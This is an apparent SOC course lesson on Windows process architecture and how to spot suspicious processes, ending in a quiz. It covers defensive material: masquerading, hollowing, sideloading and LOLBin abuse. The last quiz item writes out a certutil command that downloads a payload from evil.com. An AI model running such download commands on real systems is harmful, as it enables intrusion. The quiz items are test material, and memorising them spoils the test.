What You'll Learn
- Map the standard Windows process tree from System through user-mode applications and identify every critical process by name, expected parent, expected path, and user context
- Explain why each critical system process (smss.exe, csrss.exe, wininit.exe, services.exe, svchost.exe, lsass.exe) exists and what happens if it stops running
- Detect suspicious processes by checking five attributes: wrong parent, wrong path, wrong user, wrong instance count, and misspelled name
- Describe how attackers abuse legitimate Windows processes through masquerading, process hollowing, and DLL sideloading
- Apply process tree analysis to real Velociraptor endpoint data to distinguish normal system activity from attacker behavior in Labs 3.1–3.6
Why Process Architecture Matters for Defenders
Every Windows system runs dozens of processes at any given time. Most are legitimate — the operating system booting up, services starting, user applications launching. But hidden among them, an attacker's payload might be running as a child of a process it should never have spawned, or executing from a directory where that binary should never exist.
Knowing what "normal" looks like is the single most important skill for detecting what isn't.
This is not abstract knowledge. Every time you investigate an alert in Wazuh, triage a process creation event (Event ID 4688 or Sysmon Event ID 1), or collect a process listing in Velociraptor, you are reading a process tree. If you cannot tell whether svchost.exe running under a user account is normal (it isn't), you will miss the compromise.
| Without OS Internals Knowledge | With OS Internals Knowledge |
|---|---|
| "I see svchost.exe running. Looks normal." | "svchost.exe is running from C:\Users\Public — that's not C:\Windows\System32. This is masquerading." |
| "There are many processes. Not sure what to look at." | "lsass.exe has two instances. There should only be one. The second one is suspicious." |
| "cmd.exe is open. Users open terminals sometimes." | "cmd.exe was spawned by winword.exe. Word should never launch a command prompt. This is likely a macro payload." |
The Windows Boot Process — How the Tree Grows
When a Windows system starts, processes launch in a strict, predictable order. Each process has exactly one parent, and that parent-child relationship is fixed by design. Understanding this chain is your baseline.
Stage 1: Kernel Initialization
System (PID 4) is the first process. It represents the Windows kernel itself. You cannot kill it. It has no parent process (its PPID is 0). Every other process on the system descends from this root.
System spawns smss.exe (Session Manager Subsystem) — the process responsible for creating Windows sessions.
Stage 2: Session Creation
smss.exe has two critical jobs:
- Create Session 0 (for services and system processes) by launching a copy of itself, which then starts
csrss.exeandwininit.exe - Create Session 1 (for the first interactive user) by launching another copy, which starts
csrss.exeandwinlogon.exe
After launching its children, the initial smss.exe instance terminates its Session 0 and Session 1 copies. This is why you typically see only one smss.exe running, and its children (csrss.exe, wininit.exe) appear to be orphans — their parent has already exited.
Orphaned processes are normal at this stage. When you see csrss.exe or wininit.exe with no visible parent, that is expected behavior — smss.exe created them, then exited. However, if you see smss.exe with a parent other than System (PID 4), or multiple persistent smss.exe instances, that is suspicious.
Stage 3: Session 0 — Services
wininit.exe (Windows Initialization) runs in Session 0 and launches three critical children:
| Process | What It Does | Why Attackers Target It |
|---|---|---|
| services.exe | The Service Control Manager (SCM). Starts and manages all Windows services. | Attackers install malicious services for persistence (T1543.003) |
| lsass.exe | Local Security Authority Subsystem. Handles authentication, password hashing, token creation. | #1 credential theft target — Mimikatz, comsvcs.dll dump (T1003.001) |
| lsaiso.exe | Credential Guard isolation (if enabled). Protects credentials in a virtualization-based container. | Exists only on systems with Credential Guard enabled |
services.exe then launches svchost.exe instances — the generic service host that runs DLL-based services. A healthy Windows system has 10-20+ svchost.exe instances, each running a group of related services.
Stage 4: Session 1 — User Login
winlogon.exe handles the user login process for Session 1. After the user authenticates (via lsass.exe), winlogon launches:
- userinit.exe — initializes the user environment, then launches explorer.exe
- explorer.exe — the Windows shell (taskbar, desktop). This is the parent of everything the user launches: browsers, Office, terminals, etc.
The Critical Process Reference Card
This is the table you will reference constantly during investigations. Memorize the "Expected" columns — any deviation is a finding worth investigating.
| Process | Expected Path | Expected Parent | Expected User | Instance Count | Suspicious If... |
|---|---|---|---|---|---|
| System | N/A (kernel) | None (PID 0) | SYSTEM | Exactly 1 (PID 4) | PID is not 4, or has a parent |
| smss.exe | C:\Windows\System32\ | System (PID 4) | SYSTEM | 1 (master instance) | Multiple persistent instances, wrong parent |
| csrss.exe | C:\Windows\System32\ | smss.exe (but appears orphaned) | SYSTEM | 2+ (one per session) | Running from any other directory, has a visible parent |
| wininit.exe | C:\Windows\System32\ | smss.exe (but appears orphaned) | SYSTEM | Exactly 1 | More than one instance, wrong path |
| winlogon.exe | C:\Windows\System32\ | smss.exe (but appears orphaned) | SYSTEM | 1 per session | Running from wrong path, unexpected children |
| services.exe | C:\Windows\System32\ | wininit.exe | SYSTEM | Exactly 1 | More than one instance, wrong parent, wrong path |
| lsass.exe | C:\Windows\System32\ | wininit.exe | SYSTEM | Exactly 1 | More than one instance (credential theft indicator), wrong parent or path |
| svchost.exe | C:\Windows\System32\ | services.exe | SYSTEM, LOCAL SERVICE, or NETWORK SERVICE | Many (10-20+) | Running as a regular user, wrong parent (not services.exe), wrong path |
| explorer.exe | C:\Windows\ | userinit.exe (but appears orphaned) | Logged-in user | 1 per logged-in user | Running as SYSTEM, launched by something other than userinit/winlogon |
Save this table. Print it, bookmark it, or keep it open during investigations. When you collect a process listing from Velociraptor (Module 8) or analyze Sysmon Event ID 1 logs (Module 2), this table tells you whether what you see is normal or requires investigation.
Five Signs of a Suspicious Process
When analyzing any process on a Windows system, check these five attributes. If any one deviates from expected values, investigate further.
1. Wrong Parent
Every critical process has an expected parent. If svchost.exe is a child of explorer.exe instead of services.exe, an attacker likely launched it manually or through a script.
Normal: services.exe → svchost.exe
Suspicious: explorer.exe → svchost.exe
Suspicious: cmd.exe → svchost.exe
2. Wrong Path
System processes run from C:\Windows\System32\. If you find lsass.exe running from C:\Users\Public\ or C:\Temp\, it is a fake — an attacker binary named to look legitimate.
Normal: C:\Windows\System32\lsass.exe
Suspicious: C:\Users\Public\lsass.exe
Suspicious: C:\Windows\Temp\lsass.exe
3. Wrong User Context
svchost.exe runs as SYSTEM, LOCAL SERVICE, or NETWORK SERVICE. If it runs as jsmith or any domain user, something is wrong.
4. Wrong Instance Count
Some processes should only have one instance. Two lsass.exe processes means one of them is not the real LSASS. Two services.exe processes means one is an impersonator.
5. Misspelled Name (Masquerading)
Attackers name their binaries to look like system processes: svch0st.exe (zero instead of 'o'), scvhost.exe (letters transposed), lssas.exe (doubled 's'). These evade casual human inspection but fail the path and parent checks.
Process masquerading (T1036.005) is one of the most common defense evasion techniques. In the MITRE ATT&CK framework, it falls under Defense Evasion. Always verify the full path of any process with a "system-like" name. A process named svchost.exe in the right path with the right parent is normal. The same name in any other location or with any other parent is a finding.
How Attackers Abuse Legitimate Processes
Beyond simple masquerading, sophisticated attackers use techniques that make malicious activity appear to come from legitimate processes:
Process Hollowing (T1055.012)
The attacker starts a legitimate process (e.g., svchost.exe) in a suspended state, replaces its in-memory code with malicious code, then resumes execution. The process looks legitimate in Task Manager — correct name, correct path, correct parent — but its actual code is malicious.
Detection: Memory analysis (Module 9) can reveal hollowed processes by comparing the on-disk image with the in-memory image.
DLL Sideloading (T1574.002)
Many Windows executables load DLLs from their own directory before checking System32. An attacker places a malicious DLL with the expected name next to a legitimate executable. When the program runs, it loads the attacker's DLL instead of the real one.
Detection: Monitor for DLL loads from unusual directories (Sysmon Event ID 7).
Living Off the Land (LOLBins)
Attackers use legitimate Windows utilities to perform malicious actions:
| Binary | Legitimate Use | Attacker Abuse |
|---|---|---|
powershell.exe | Scripting and automation | Download payloads, execute in memory |
certutil.exe | Certificate management | Download files (-urlcache -f) |
mshta.exe | Run HTML applications | Execute scripts from URLs |
rundll32.exe | Run DLL functions | Execute malicious DLLs |
regsvr32.exe | Register COM DLLs | Execute code via scriptlets |
bitsadmin.exe | Background file transfers | Download payloads silently |
Detection: These processes are legitimate, so you cannot simply block them. Instead, monitor their command lines (Sysmon Event ID 1) for suspicious arguments like URLs, encoded commands, or unusual paths.
Connecting Process Analysis to Your SOC Tools
Every tool you have learned (or will learn) uses process information:
| Tool | How It Uses Process Data | Module |
|---|---|---|
| Wazuh | Sysmon Event ID 1 (ProcessCreate) logs process name, path, parent, command line, user | Module 2 |
| Velociraptor | Collects live process tree, open handles, loaded DLLs, memory regions | Module 8 |
| YARA | Scans process memory for malware patterns | Module 10 |
| Sigma | Rules match on process creation fields (Image, ParentImage, CommandLine, User) | Module 12 |
| Volatility | Analyzes process list from memory dumps, detects hollowing and injection | Module 9 |
This is foundation knowledge. Every investigation you perform in later modules — whether you are triaging a Wazuh alert, hunting with Velociraptor, writing a Sigma rule, or analyzing a memory dump — starts with understanding the process tree. The analyst who knows that winword.exe → cmd.exe → powershell.exe is a macro executing a payload can triage that alert in 30 seconds. The analyst who does not recognize that chain will spend 30 minutes researching it.
Key Takeaways
- The Windows process tree follows a strict hierarchy: System → smss.exe → csrss.exe/wininit.exe/winlogon.exe → services.exe/lsass.exe → svchost.exe → user applications
- Every critical system process has an expected path, parent, user context, and instance count — any deviation is a finding
- The five signs of a suspicious process are: wrong parent, wrong path, wrong user, wrong instance count, and misspelled name
- lsass.exe is the #1 target for credential theft — more than one instance or unusual access patterns always warrant investigation
- Attackers use process hollowing, DLL sideloading, and LOLBins (Living Off the Land Binaries) to hide within legitimate processes
- Process analysis connects directly to Wazuh (Sysmon events), Velociraptor (live process collections), YARA (memory scanning), Sigma (detection rules), and Volatility (memory forensics)
- Memorize the Critical Process Reference Card — it is the baseline you will use in every investigation
What's Next
Now that you understand how processes work on Windows, Lesson 3.2 examines the two other pillars of Windows internals that defenders must know: the file system (NTFS, MFT, timestamps) and the registry (hive structure, persistence locations, forensic artifacts). Together with process architecture, these three areas form the foundation for all Windows-based investigation and detection.
Knowledge Check: Windows Process Architecture
10 questions · 70% to pass
What is the expected parent process of services.exe on a healthy Windows system?
An analyst finds two lsass.exe processes running on a Windows workstation. What does this indicate?
svchost.exe is found running as user 'jsmith' instead of SYSTEM. What should the analyst conclude?
Which MITRE ATT&CK technique describes attackers naming their binaries to resemble legitimate system processes?
What is the primary purpose of lsass.exe in Windows?
An analyst sees this process chain: winword.exe → cmd.exe → powershell.exe. What does this likely indicate?
Why do csrss.exe and wininit.exe appear as 'orphaned' processes with no visible parent in process tree tools?
In Lab 3.1, you collect a process tree using Velociraptor. You find svchost.exe running from C:\Users\Public\svchost.exe with explorer.exe as its parent. Which two of the five suspicious indicators are present?
Which Sysmon Event ID captures process creation events, including the command line, parent process, and user?
An attacker uses certutil.exe -urlcache -f http://evil.com/payload.exe to download a file. Why is this technique difficult to block?
0/10 answered